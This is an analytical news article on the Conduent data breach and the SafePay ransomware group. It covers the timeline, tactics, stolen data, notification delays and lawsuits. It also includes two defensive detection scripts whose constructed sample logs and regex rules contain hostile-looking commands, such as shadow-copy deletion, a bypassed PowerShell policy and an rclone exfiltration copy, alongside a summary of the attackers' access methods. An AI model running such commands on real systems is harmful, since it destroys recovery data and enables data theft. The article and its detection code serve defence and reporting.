The Conduent Breach: 84 Days Inside a Government Contractor, 25 Million Victims, and the Ransomware Group Nobody Saw Coming

A ransomware group that barely existed twelve months ago spent nearly three months moving freely through the systems of one of America's most critical government contractors, stealing 8.5 terabytes of healthcare and social services data while state agencies reported nothing more than "service disruptions." The full scale of the Conduent breach is only now becoming clear — and at 25 million confirmed victims and rising, it is among the largest healthcare data breaches ever recorded in the United States, and likely the largest of 2025. For comparison, the Change Healthcare ransomware attack of February 2024 ultimately affected 193 million people; Conduent's breach may not reach that scale, but it has already surpassed every comparable incident in recent memory outside that singular event.

  • 25M+: Americans confirmed affected as of Feb 2026
  • 8.5TB: Data exfiltrated by SafePay ransomware group
  • 84: Days attackers had undetected access
  • 9mo: Gap between discovery and victim notification

When Wisconsin's Department of Children and Families reported disruptions to its child support payment systems in January 2025, and Oklahoma's Human Services agency reported similar outages, neither could have known those disruptions were the first visible signal of a breach that had already been underway for nearly three months. By the time Conduent Business Services traced the source, an unknown attacker had already finished what they came to do: exfiltrate some of the most sensitive data the U.S. government entrusts to a private company, at enormous scale, then walk out.

This is not a story about a sophisticated zero-day attack or a novel technique. It is a story about dwell time, inadequate detection, third-party risk concentration, and a notification process so delayed it may itself constitute a legal violation. It is also a story about a ransomware group that appeared from nowhere in late 2024 and immediately became one of the most operationally aggressive in the world.

Who Is Conduent and Why It Matters

Conduent Business Services, headquartered in Florham Park, New Jersey, is not a household name. That's precisely the problem. The company was spun off from Xerox Corporation in 2017 and has since grown into a critical component of American public infrastructure through a role so embedded that few outside government procurement would recognize it. It provides technology-enabled back-office services including medical billing, Medicaid administration, child support payment systems, toll collection, food assistance programs, and document processing to government agencies and healthcare organizations across the country.

The numbers tell the story. Conduent manages technology and payment systems for 46 U.S. states. It processes approximately $85 billion in annual disbursements. It handles over 2 billion customer service interactions each year. By its own estimate, the company supports roughly 100 million U.S. residents through various government health and welfare programs. It serves nearly half of the Fortune 100 and more than 600 government and transportation agencies globally.

Its client list in the healthcare sector includes Humana, Blue Cross Blue Shield of Texas, Blue Cross Blue Shield of Montana, Blue Cross and Blue Shield of Illinois, and Premera Blue Cross. Its government clients include state Medicaid agencies, child support programs, food assistance systems, and unemployment insurance operations. Conduent is, in the language of data privacy law, a business associate under HIPAA — meaning every healthcare client that trusts it with patient records has a legal obligation to ensure Conduent is protecting that data to the standard required by federal law.

Third-Party Risk Concentration

Conduent exemplifies a structural vulnerability in U.S. public infrastructure: the outsourcing of critical government data to private vendors creates single points of failure that, when compromised, expose data from dozens of agencies and millions of beneficiaries simultaneously. No individual state or healthcare client could have prevented this breach by improving their own security posture.

The Attack Timeline

The chronology of the Conduent breach is, by itself, damning.

October 21, 2024
An unauthorized third party gains access to Conduent's network. The intrusion goes undetected. Attackers begin conducting reconnaissance and exfiltrating data.
January 13, 2025
Conduent detects the intrusion after service disruptions surface at client agencies, including the Wisconsin Department of Children and Families and Oklahoma Human Services. The company secures its network and engages third-party forensic investigators. By this point, the attackers have had 84 days of undetected access.
January–February 2025
The SafePay ransomware group adds Conduent to its dark web data leak site — first observed by dark web monitoring platforms in late January 2025 and publicly reported in February 2025 — claiming to have stolen 8.5 terabytes of data and threatening to publish it unless a ransom is paid. This is the first public indication of the breach's nature.
April 14, 2025
Conduent files a Form 8-K with the U.S. Securities and Exchange Commission (SEC), disclosing that a cybersecurity incident occurred and that the attackers had exfiltrated files belonging to a limited number of clients. The filing confirms data was stolen but does not yet specify the number of individuals affected. Investors receive formal disclosure five months before the first victim notification letters are sent.
September 30, 2025
Conduent files an updated 10-Q with the SEC, disclosing that the breach affected a significant number of individuals and that notifications to clients and regulators had begun. Affected individuals are still weeks away from receiving notification letters.
October 2025
Conduent begins sending breach notification letters to affected individuals — nine months after detecting the intrusion. Initial breach reports filed with state attorneys general indicate approximately 4 million Texans and 10.5 million total individuals were affected. Wisconsin Department of Children and Families had notified affected individuals months earlier, in January.
October–December 2025
Victim counts escalate dramatically as investigations proceed. The Texas estimate grows from 4 million to nearly 15 million. Breach reports are filed in California, Delaware, Indiana, Maine, Massachusetts, New Hampshire, Oregon, and Vermont. Additional corporate clients including Volvo Group North America (affecting approximately 17,000 employees) receive notifications.
February 2026
Total confirmed affected individuals surpasses 25 million. Conduent states it expects all consumer notifications to be completed by April 15, 2026. Multiple class action lawsuits are consolidated in New Jersey federal court. Texas Attorney General launches a formal investigation. Conduent is no longer listed on the SafePay leak site.

What this timeline reveals is a 16-month span between the initial compromise and the completion of victim notifications. It reveals an 84-day dwell time during which an attacker moved through a network holding some of the most sensitive health and social services data in the country, undetected. It reveals a nine-month gap between detecting a breach and telling the people whose data was stolen.

Who Is SafePay?

The Conduent breach introduced many security professionals to SafePay, a ransomware group that had been operating for barely two months at the time of the intrusion. Understanding who they are matters, because the breach at Conduent represents SafePay's first confirmed major strike against a U.S. technology firm — and the group has moved fast since then.

SafePay's first confirmed activity dates to September 2024. Its data leak site appeared in November 2024. By May 2025, it had become the single most active ransomware operation globally by victim count. By mid-2025 it had claimed over 200 victims in a single quarter. This is not a group that slowly built its capabilities. It arrived operationally mature.

"Establishing itself as one of the most operationally efficient ransomware groups despite its recent emergence, SafePay demonstrates technical capabilities and an immediate high-volume operational tempo suggesting involvement of experienced threat actors rather than genuine newcomers." — Halcyon Threat Intelligence

Security researchers have traced SafePay's ransomware binary to the leaked LockBit 3.0 source code, which was made publicly available in late 2022. However, this is not a simple copy-paste operation. Forensic analysis by Huntress, Bitdefender, and Acronis has identified meaningful divergences from LockBit's implementation. While both groups use the ChaCha20 encryption algorithm, SafePay generates a unique symmetric key for each encrypted file and embeds a master key within the ransomware itself — a structural difference from LockBit's shared key management approach. The group has also incorporated techniques observed in ALPHV/BlackCat and INC Ransom operations, suggesting access to a broad pool of ransomware knowledge.

What makes SafePay operationally distinctive is its organizational model. Unlike the Ransomware-as-a-Service (RaaS) structure used by LockBit, ALPHV, and RansomHub — where operators sell or lease access to their ransomware to affiliates who conduct the actual attacks — SafePay operates as a closed, centralized group. It conducts all attacks itself, manages all infrastructure internally, and retains all revenue. This model eliminates the affiliate risk that led to the downfall of LockBit (where an affiliate leaked internal data in retaliation for a payment dispute) and provides tighter operational security. It is harder to infiltrate, harder to turn informants against, and harder to disrupt through the kind of affiliate recruitment stings that law enforcement has used against RaaS groups.

SafePay's attack methodology is characterized by speed. Once inside a network, the group consistently achieves full encryption within 24 hours. Its initial access vectors include credential brute-forcing, exploitation of exposed RDP instances, VPN appliance vulnerabilities — particularly misconfigured Fortinet firewalls — and compromised credentials obtained from initial access brokers. For lateral movement, it deploys ShareFinder.ps1 to enumerate network shares, uses PsExec, and leverages living-off-the-land binaries (LOLBins) to avoid detection. Before deploying the encryptor, it uses FileZilla and Rclone to exfiltrate data, and then deletes Volume Shadow Copies to prevent recovery.

One behavioral detail is telling: SafePay's ransomware checks for Cyrillic keyboard layouts on targeted systems and refuses to execute if Cyrillic is enabled. This is a kill switch commonly used by ransomware groups that want to avoid targeting systems in Russia or CIS countries — a practice associated either with operators based in those regions, or with those deliberately signaling deference to Russian-speaking threat actor communities. The geographic origin of SafePay remains unconfirmed.

SafePay Technical Fingerprint
  • Ransomware base: LockBit 3.0 leaked source code with significant modifications
  • Encryption: ChaCha20 with unique per-file symmetric keys
  • Initial access: RDP brute force, VPN exploitation, credential brokers, Fortinet misconfigurations
  • Lateral movement: ShareFinder.ps1, PsExec, LOLBins, RMM tools
  • Exfiltration tools: FileZilla, Rclone, WinRAR
  • Kill switch: Cyrillic keyboard layout detection — aborts execution if found
  • Model: Closed, centralized operation — no affiliates, no RaaS
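The toolchain described above (share enumeration, PsExec, Rclone/FileZilla staging, shadow copy deletion) is most useful to a defender as a correlated sequence per host rather than as isolated alerts. The script below is an added example, not code from the article or from any vendor named in it: it parses constructed process-creation events (not Conduent telemetry) in an assumed pipe-delimited format, tags each event with a stage from the fingerprint list, and raises the severity when one host shows both an exfiltration tool and recovery sabotage. The exact shadow copy commands (`vssadmin delete shadows`, `wmic shadowcopy delete`) are well-known Windows invocations assumed here; the article only says that shadow copies were deleted.

```python
"""Correlate ransomware-precursor process events per host.

Constructed process-creation events (not real telemetry) in an assumed
pipe-delimited format: timestamp|host|user|image|command_line.
Stage patterns follow the publicly described SafePay toolchain
(ShareFinder.ps1, PsExec, Rclone/FileZilla/WinRAR, shadow-copy deletion).
"""
import re
from collections import defaultdict
from dataclasses import dataclass

# Constructed sample: one file server showing the full chain, one
# workstation with a single rclone hit that may well be legitimate.
SAMPLE_EVENTS = """\
2024-10-22T03:14:09Z|FS01|CORP\\svc_backup|powershell.exe|powershell.exe -ep bypass -f C:\\Users\\Public\\ShareFinder.ps1
2024-10-22T03:20:41Z|FS01|CORP\\svc_backup|psexec.exe|psexec.exe \\\\DB02 -s cmd.exe /c whoami
2024-10-23T01:02:15Z|FS01|CORP\\svc_backup|rclone.exe|rclone.exe copy D:\\claims remote:bucket --transfers 32
2024-10-23T02:45:00Z|FS01|CORP\\svc_backup|vssadmin.exe|vssadmin.exe delete shadows /all /quiet
2024-10-22T09:00:00Z|WS17|CORP\\jdoe|rclone.exe|rclone.exe sync C:\\Users\\jdoe\\Photos gdrive:photos
2024-10-22T09:05:00Z|WS17|CORP\\jdoe|excel.exe|excel.exe C:\\Users\\jdoe\\budget.xlsx
"""

# (stage name, regex applied to the lower-cased "image command_line" string)
RULES = [
    ("share_enum", re.compile(r"sharefinder\.ps1")),
    ("lateral_psexec", re.compile(r"(^|\\)psexec(64)?\.exe")),
    ("exfil_tool", re.compile(r"(^|\\)(rclone|filezilla|winrar)\.exe")),
    ("shadow_delete", re.compile(
        r"vssadmin\.exe.*delete\s+shadows|wmic\.exe.*shadowcopy.*delete")),
]


@dataclass
class Event:
    ts: str
    host: str
    user: str
    image: str
    cmd: str


def parse_events(text):
    """Parse the assumed pipe-delimited format into Event records."""
    events = []
    for line in text.splitlines():
        if not line.strip():
            continue
        ts, host, user, image, cmd = line.split("|", 4)
        events.append(Event(ts, host, user, image, cmd))
    return events


def classify(event):
    """Return every stage name whose pattern matches this event."""
    haystack = f"{event.image} {event.cmd}".lower()
    return [name for name, rx in RULES if rx.search(haystack)]


def severity(stages):
    """Exfil tool plus shadow deletion on one host is the double-extortion precursor."""
    if "shadow_delete" in stages and "exfil_tool" in stages:
        return "critical"
    if len(stages) >= 2:
        return "high"
    return "medium"   # a lone rclone/psexec hit needs context before paging anyone


def correlate(events):
    """Group stage hits per host, in time order, and assign a severity."""
    per_host = defaultdict(lambda: {"stages": set(), "hits": []})
    for ev in sorted(events, key=lambda e: e.ts):
        for stage in classify(ev):
            per_host[ev.host]["stages"].add(stage)
            per_host[ev.host]["hits"].append((ev.ts, stage, ev.cmd))
    for rec in per_host.values():
        rec["severity"] = severity(rec["stages"])
    return dict(per_host)


if __name__ == "__main__":
    for host, rec in correlate(parse_events(SAMPLE_EVENTS)).items():
        print(host, rec["severity"], sorted(rec["stages"]))
        for ts, stage, cmd in rec["hits"]:
            print("   ", ts, stage, cmd)
```

The point of the per-host grouping is the dwell-time problem the article describes: each of these events on its own is noisy (administrators run PsExec, users run Rclone), but the ordered chain on a single file server is the signal a network with 84 days of attacker presence should have produced long before encryption.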

The timing of SafePay's emergence in September 2024 is significant. Operation Cronos, the coordinated law enforcement takedown of LockBit's infrastructure, concluded in early 2024. ALPHV shut down shortly afterward. The resulting vacuum in the ransomware ecosystem created an opportunity for experienced operators to establish new, independent groups. SafePay's immediate operational maturity — evidenced by its ability to publish 23 victims in a single day by November 2024, a volume that rivals top-tier RaaS operations — strongly suggests its core membership includes veteran ransomware operators, not newcomers learning the trade. Conduent appears to have been targeted during this initial surge, before SafePay had attracted meaningful public attention from the security community.

What Was Stolen

The files exfiltrated from Conduent's network contain information that, in data breach terms, represents a complete identity theft package. According to breach notifications filed with multiple state attorneys general, the stolen data includes full names, home addresses, dates of birth, Social Security numbers, medical treatment information, health insurance details, and claims data.

This combination is worth pausing on. Social Security numbers are the skeleton key of American identity verification: they are used for credit applications, tax filings, government benefit claims, and identity verification across virtually every financial institution in the country. Medical records carry HIPAA protection precisely because their misuse can lead to insurance fraud, prescription drug scams, and targeted extortion. Health insurance details enable fraudulent claims, false billing, and impersonation within healthcare systems. Combined with addresses and dates of birth, this data enables identity theft across every domain simultaneously — financial, medical, governmental, and personal.

The scale of the exfiltration — 8.5 terabytes — is among the largest documented in a single ransomware incident. Conduent has stated that its forensic investigators have found no evidence the data has been published online or sold on dark web marketplaces. This claim is worth treating with skepticism, not because it is necessarily false, but because the absence of Conduent from the SafePay leak site is itself an ambiguous signal. Ransomware groups typically remove victims from their sites when a ransom is paid, when data is sold, or when a negotiated settlement is reached. Conduent has not confirmed whether any ransom was paid.

SafePay claims to have stolen all 8.5 terabytes. The SafePay data leak site no longer lists Conduent. The stolen data has not surfaced publicly. The company has set aside $25 million to cover notification costs, credit monitoring, and identity protection services under an agreement with its clients. Its cyber insurance policy covers any costs that exceed this amount. These facts are consistent with multiple outcomes — including, but not limited to, a ransom payment.

One note on attribution: while SafePay publicly claimed responsibility and was identified on its leak site, Conduent has not formally confirmed the group's identity. HIPAA Journal and other sources have noted that ransomware groups occasionally fabricate or exaggerate claims against high-profile targets. The available evidence — leak site listing, claimed data volume, timing, and subsequent removal — is consistent with a genuine SafePay attack, but the exact technical attribution has not been independently verified by law enforcement at the time of publication.

"Working in conjunction with our clients, we expect to send out all of the consumer notifications by April 15. In addition, a dedicated call center has been set up to address consumer inquiries." — Conduent statement to Fox Business, February 2026

The Notification Failure

Of all the failures documented in the Conduent breach, the notification delay is the one with the clearest legal and ethical implications. Conduent detected the intrusion on January 13, 2025. Affected individuals did not begin receiving notification letters until October 2025. That is a gap of approximately nine months between knowing that patients' Social Security numbers, medical records, and health insurance data had been stolen, and telling those patients. Investors, by contrast, received formal disclosure via SEC Form 8-K on April 14, 2025 — five months before the first victim notification was sent.

HIPAA requires covered entities and their business associates to notify affected individuals within 60 days of discovering a breach. State breach notification laws have varying timelines, but most require notification within 30 to 90 days. A nine-month delay is not a minor deviation from these requirements. It is a near-complete disregard for them.

The practical harm of the delay is significant. During the nine months between detection and notification, affected individuals had no way to take protective action. They could not place credit freezes in response to a breach they did not know had occurred. They could not monitor their insurance explanations of benefits for fraudulent claims. They could not enroll in credit monitoring. They were exposed, uninformed, and unprotected, while Conduent conducted its investigation and prepared its notifications.

HIPAA Violation Exposure

HIPAA mandates breach notification within 60 days of discovery for covered entities and their business associates. Conduent's notification process began approximately 270 days after discovery. Multiple affected healthcare clients — including Blue Cross Blue Shield of Texas, Blue Cross Blue Shield of Montana, and Premera Blue Cross — also delayed notifications, in some cases until October 2025. Both the covered entities and their business associate face potential regulatory action from the HHS Office for Civil Rights.

Several of Conduent's healthcare clients followed a similar pattern. Blue Cross Blue Shield of Montana, Blue Cross and Blue Shield of Texas, and Premera Blue Cross did not notify affected individuals until on or around October 2025, according to breach attorneys investigating the case. The Wisconsin Department of Children and Families and Oklahoma Human Services notified affected individuals of service disruptions in January 2025 — the same month the breach was discovered — though these were operational outage notices, not full data breach notifications. The complete scope of the data theft was not known in January. This disparity suggests that some clients acted on their notification obligations promptly while others did not.

The Victim Count That Won't Stop Growing

The victim count in the Conduent breach has followed an unusual trajectory: it has grown by an order of magnitude from the first estimates and shows no signs of being final.

When Conduent filed its initial breach reports with state attorneys general in October 2025, it estimated that approximately 4 million Texans were affected, with total U.S. victims at roughly 10.5 million based on the Oregon Department of Justice's filing. That figure was already enough to rank the incident among the ten largest healthcare data breaches ever recorded in the United States — and at the time, it ranked behind only the Aflac supplemental insurance breach, which affected 22.7 million people and had been the largest confirmed health data breach of 2025 until Conduent's numbers overtook it. Then the counting continued.

Texas updated its figures. The initial 4 million estimate grew to nearly 14.8 million, then to 15.4 million, and most recently to 15,494,592 — a number representing more than half of Texas's entire population. Oregon maintained its figure of approximately 10.5 million, though the overlap with Texas is unclear. Breach reports to additional state attorneys general in Delaware, Massachusetts, California, Indiana, Maine, New Hampshire, and Vermont added hundreds of thousands more. Corporate clients like Volvo Group North America added tens of thousands of employees. Total confirmed victims now exceed 25 million.

The reason for the dramatic revision is worth understanding. When Conduent filed its initial breach reports, the data review was still in progress. Forensic investigators were still working through the 8.5 terabytes of exfiltrated data, matching records to individuals, clients, and affected programs. What appeared at first to be approximately 4 million Texans turned out to be four times that number. The scale of the breach, and the complexity of Conduent's role as an intermediary holding data on behalf of dozens of clients serving millions of beneficiaries, made the victim count genuinely difficult to establish in real time.

That explanation does not fully account for the nine-month notification delay, but it does illustrate why the victim count in breaches of this type often grows significantly after initial disclosures. The first number is rarely the final number.

Legal and Regulatory Fallout

The legal response to the Conduent breach has been swift and broad. At least ten federal class action lawsuits have been filed in the U.S. District Court for the District of New Jersey, consolidated under Judge Michael A. Hammer, who appointed an eight-member Plaintiffs' Steering Committee in December 2025 to coordinate the litigation. The lawsuits advance several theories of liability.

The negligence claims center on Conduent's alleged failure to implement adequate cybersecurity safeguards for the sensitivity of the data it handled. As a HIPAA business associate, Conduent had a legal obligation to implement administrative, physical, and technical safeguards sufficient to protect protected health information. Plaintiffs argue that a company entrusted with the Social Security numbers and medical records of 25 million Americans, processing $85 billion in annual disbursements, should have been able to detect an intrusion within days, not months.

The negligence per se theory relies on the HIPAA violation itself as the basis for civil liability. The breach of third-party beneficiary contract claims assert that individuals whose data Conduent held were intended beneficiaries of the security obligations in Conduent's contracts with healthcare and government clients. Plaintiffs are seeking compensatory, statutory, and punitive damages, as well as injunctive relief requiring Conduent to implement enhanced security measures.

"The Conduent data breach was likely the largest breach in U.S. history. If any insurance giant cut corners or has information that could help us prevent breaches like this in the future, I will work to uncover it." — Texas Attorney General Ken Paxton

Texas Attorney General Ken Paxton announced a formal investigation into both Conduent and Blue Cross Blue Shield of Texas. The Texas AG's office is seeking documentation on Conduent's security policies, practices, and protocols, and has separately requested evidence from BCBSTX to determine whether it complied with Texas law in its handling of the breach and subsequent notification. Additional investigations by the U.S. Department of Health and Human Services Office for Civil Rights (HHS OCR) are expected, though the OCR's breach portal had not been updated as of late 2025 due to an administrative lapse.

Conduent has committed $25 million under its notification agreement with clients to cover the costs of identifying affected individuals, issuing breach notifications, and providing credit monitoring, dark web monitoring, and identity restoration services. SEC filings indicate that approximately $9 million of that amount had been disbursed by September 2025, with the remaining $16 million expected to be paid out by early 2026. The company's cyber insurance policy covers any costs that exceed the $25 million threshold, within policy limits. Affected individuals have until March 31, 2026, to enroll in the free two-year credit monitoring service Conduent is offering — a deadline that is not negotiable. Accepting free credit monitoring does not waive the right to participate in class action litigation or receive future settlements.

Key Takeaways and Defense

  1. Dwell time is the number that matters. Eighty-four days of undetected access is not a failure of perimeter security alone — it is a failure of detection. Modern threat actors do not rely on quick smash-and-grab attacks. They establish persistence, conduct reconnaissance, and move laterally before triggering any alarm. Organizations that rely on perimeter controls without robust network monitoring, anomaly detection, and behavioral analytics will consistently fail to detect attackers who have already bypassed the perimeter. For a company of Conduent's scale, handling data of this sensitivity, three months of undetected lateral movement represents a fundamental detection gap.
  2. Third-party risk is first-party risk. Every healthcare organization and government agency that contracted with Conduent owned a portion of this breach risk, even if they had nothing to do with Conduent's security failures. Third-party risk management cannot be limited to a vendor questionnaire completed at contract signing. It requires ongoing verification that business associates holding sensitive data are maintaining the security posture they claimed to have when the contract was signed. HIPAA's business associate agreement requirements exist precisely to create shared accountability. That accountability failed here at every level.
  3. Notification delays cause real harm. The nine-month gap between breach discovery and victim notification was not simply a compliance failure. During those nine months, 25 million people whose Social Security numbers had been stolen could not take the basic step of placing a credit freeze. They could not monitor their insurance for fraudulent claims. They were exposed. Every day of delay in breach notification is a day of increased risk for affected individuals. HIPAA's 60-day timeline exists because of this reality. Organizations that treat notification as an optional final step after a breach, rather than an urgent obligation, should expect both regulatory action and civil liability.
  4. New ransomware groups can be immediately dangerous. SafePay appeared in September 2024 and hit Conduent within two months of its first known activity. The group's immediate operational sophistication — its closed structure, rapid deployment capability, and volume of victims in its first weeks — challenges the assumption that new threat actors need time to mature before they become serious threats. Organizations cannot assume that an unknown group is unsophisticated simply because they have not heard of it.
  5. Double extortion changes the calculus. SafePay exfiltrated the data before deploying any encryptor. This sequence, now standard across advanced ransomware operations, means that restoring from backup does not resolve the incident. The data is still gone. The extortion threat remains valid whether or not the victim can recover their systems. Defenses that focus on backup integrity and recovery speed, while important, do not address the exfiltration half of double extortion. Data loss prevention controls, egress monitoring, and segmentation that limits how much data can leave a network in any given period all become essential components of a complete ransomware defense strategy.
  6. Exposed RDP and VPN are still the primary gates. SafePay's documented initial access methods — RDP brute force, VPN exploitation, compromised credentials — are not novel. They are the same vectors that have driven the majority of ransomware intrusions for the past five years. If your organization has exposed RDP instances, unpatched VPN appliances, or does not enforce multi-factor authentication across all remote access paths, you are not defended against the threat class that hit Conduent. These are not advanced techniques requiring sophisticated countermeasures. They are basic hygiene failures.
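Takeaways 5 and 6 both come down to telemetry that was evidently not being watched: outbound volume per host (the exfiltration half of double extortion) and authentication behaviour on remote-access gateways. The script below is an added example written for this article, not Conduent's or any vendor's code. It runs two detections over constructed data: hourly egress totals compared against each host's own median hour, and a failed-logon burst followed by a success on an assumed VPN/RDP gateway log format, with any success that did not require MFA flagged as a policy gap. Thresholds, hostnames, IPs and field names are all assumptions.

```python
"""Two lightweight detections for the takeaways above (constructed data).

1. Egress anomaly: bytes leaving each host per hour versus that host's own
   median hour, so a 9.5 GB hour on a file server stands out even though a
   30 MB spike on a workstation does not.
2. Remote-access abuse: a burst of failed logons from one source followed
   by a success, plus any success that was not MFA-protected.
"""
from collections import defaultdict
from statistics import median

# Constructed hourly egress summaries: (hour, host, bytes_out). Not real telemetry.
EGRESS = [
    ("2024-10-22T00", "FS01", 40_000_000), ("2024-10-22T01", "FS01", 38_000_000),
    ("2024-10-22T02", "FS01", 41_000_000), ("2024-10-22T03", "FS01", 52_000_000),
    ("2024-10-22T04", "FS01", 39_000_000), ("2024-10-23T01", "FS01", 9_500_000_000),
    ("2024-10-22T00", "WS17", 900_000),    ("2024-10-22T01", "WS17", 1_200_000),
    ("2024-10-22T02", "WS17", 30_000_000), ("2024-10-22T03", "WS17", 800_000),
]
EGRESS_RATIO = 10                   # hour must exceed 10x the host's median hour...
EGRESS_MIN_BYTES = 1_000_000_000    # ...and at least 1 GB, so tiny hosts stay quiet

# Constructed gateway log (assumed format): one source hammering a service
# account until it succeeds without MFA, and two normal users.
AUTH_LOG = """\
2024-10-20T22:01:03Z gateway=VPN01 src=198.51.100.20 user=svc_backup result=FAIL mfa=n/a
2024-10-20T22:01:09Z gateway=VPN01 src=198.51.100.20 user=svc_backup result=FAIL mfa=n/a
2024-10-20T22:01:15Z gateway=VPN01 src=198.51.100.20 user=svc_backup result=FAIL mfa=n/a
2024-10-20T22:01:22Z gateway=VPN01 src=198.51.100.20 user=svc_backup result=FAIL mfa=n/a
2024-10-20T22:01:30Z gateway=VPN01 src=198.51.100.20 user=svc_backup result=FAIL mfa=n/a
2024-10-20T22:01:41Z gateway=VPN01 src=198.51.100.20 user=svc_backup result=FAIL mfa=n/a
2024-10-20T22:03:12Z gateway=VPN01 src=198.51.100.20 user=svc_backup result=SUCCESS mfa=no
2024-10-20T22:10:00Z gateway=VPN01 src=192.0.2.44 user=jdoe result=SUCCESS mfa=yes
2024-10-20T22:11:00Z gateway=VPN01 src=192.0.2.45 user=asmith result=FAIL mfa=n/a
2024-10-20T22:11:30Z gateway=VPN01 src=192.0.2.45 user=asmith result=SUCCESS mfa=yes
"""
FAIL_THRESHOLD = 5


def egress_anomalies(flows, ratio=EGRESS_RATIO, min_bytes=EGRESS_MIN_BYTES):
    """Return [(host, hour, bytes_out, median_of_other_hours)] for outlier hours."""
    per_host = defaultdict(dict)
    for hour, host, nbytes in flows:
        per_host[host][hour] = per_host[host].get(hour, 0) + nbytes
    findings = []
    for host, hours in per_host.items():
        for hour, nbytes in sorted(hours.items()):
            others = [b for h, b in hours.items() if h != hour]
            if not others:
                continue
            base = median(others)   # median, so the outlier does not drag its own baseline up
            if nbytes >= min_bytes and nbytes > ratio * base:
                findings.append((host, hour, nbytes, base))
    return findings


def parse_auth(text):
    """Parse the assumed 'ts key=value ...' gateway format into dicts."""
    events = []
    for line in text.splitlines():
        if not line.strip():
            continue
        ts, rest = line.split(" ", 1)
        fields = dict(kv.split("=", 1) for kv in rest.split())
        fields["ts"] = ts
        events.append(fields)
    return events


def remote_access_findings(events, fail_threshold=FAIL_THRESHOLD):
    """Flag a failure burst that ends in success, and any success without MFA.

    Assumes events arrive in chronological order, as in the sample.
    """
    fails = defaultdict(int)
    findings = []
    for ev in events:
        src, user = ev["src"], ev["user"]
        if ev["result"] == "FAIL":
            fails[src] += 1
            continue
        if fails[src] >= fail_threshold:
            findings.append(("brute_force_then_success", src, user, fails[src]))
        if ev["mfa"] != "yes":
            findings.append(("success_without_mfa", src, user, 0))
        fails[src] = 0   # a success resets the counter for that source
    return findings


if __name__ == "__main__":
    for finding in egress_anomalies(EGRESS):
        print("EGRESS", *finding)
    for finding in remote_access_findings(parse_auth(AUTH_LOG)):
        print("AUTH", *finding)
```

Two design choices are deliberate: the egress rule compares a host against itself (a file server's normal hour is not a workstation's), and the absolute floor keeps the ratio rule from paging on small hosts. The MFA check reports every non-MFA success, not just the one after a burst, because the takeaway is that any remote-access path without MFA is an unguarded gate regardless of whether an attacker has found it yet.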

If You Received a Notification Letter

Conduent is offering two years of free credit monitoring and identity restoration through a third-party provider. Enrollment deadline is March 31, 2026. Enrolling does not waive your right to join any class action lawsuit or receive future settlement compensation. Independent of any Conduent offering, you should also:

  • Place a credit freeze at all three major bureaus (Equifax, Experian, TransUnion) — this is free and prevents new credit from being opened in your name
  • Review your insurance Explanation of Benefits (EOB) statements for procedures or prescriptions you did not receive
  • Monitor bank and credit accounts for unauthorized transactions
  • Be highly alert to phishing attempts using your name, insurer's name, or government program details — attackers with this dataset can craft convincing impersonation messages
  • Check your Social Security Administration account at ssa.gov for unauthorized changes to your benefits or employment history

The Conduent breach is not a story about an unstoppable attacker. SafePay used credential-based initial access, exploited a detection gap, and then exfiltrated data at a pace and volume that should have triggered alarm. The fact that it did not — for 84 days, across a network belonging to a company that holds sensitive data for 100 million Americans — is the story. The breach was not inevitable. The nine-month notification delay was not inevitable. The victim count was not inevitable. What was inevitable, given the documented absence of adequate detection and response capability, was that eventually someone would walk in and take what they wanted. SafePay was simply the group that arrived first.
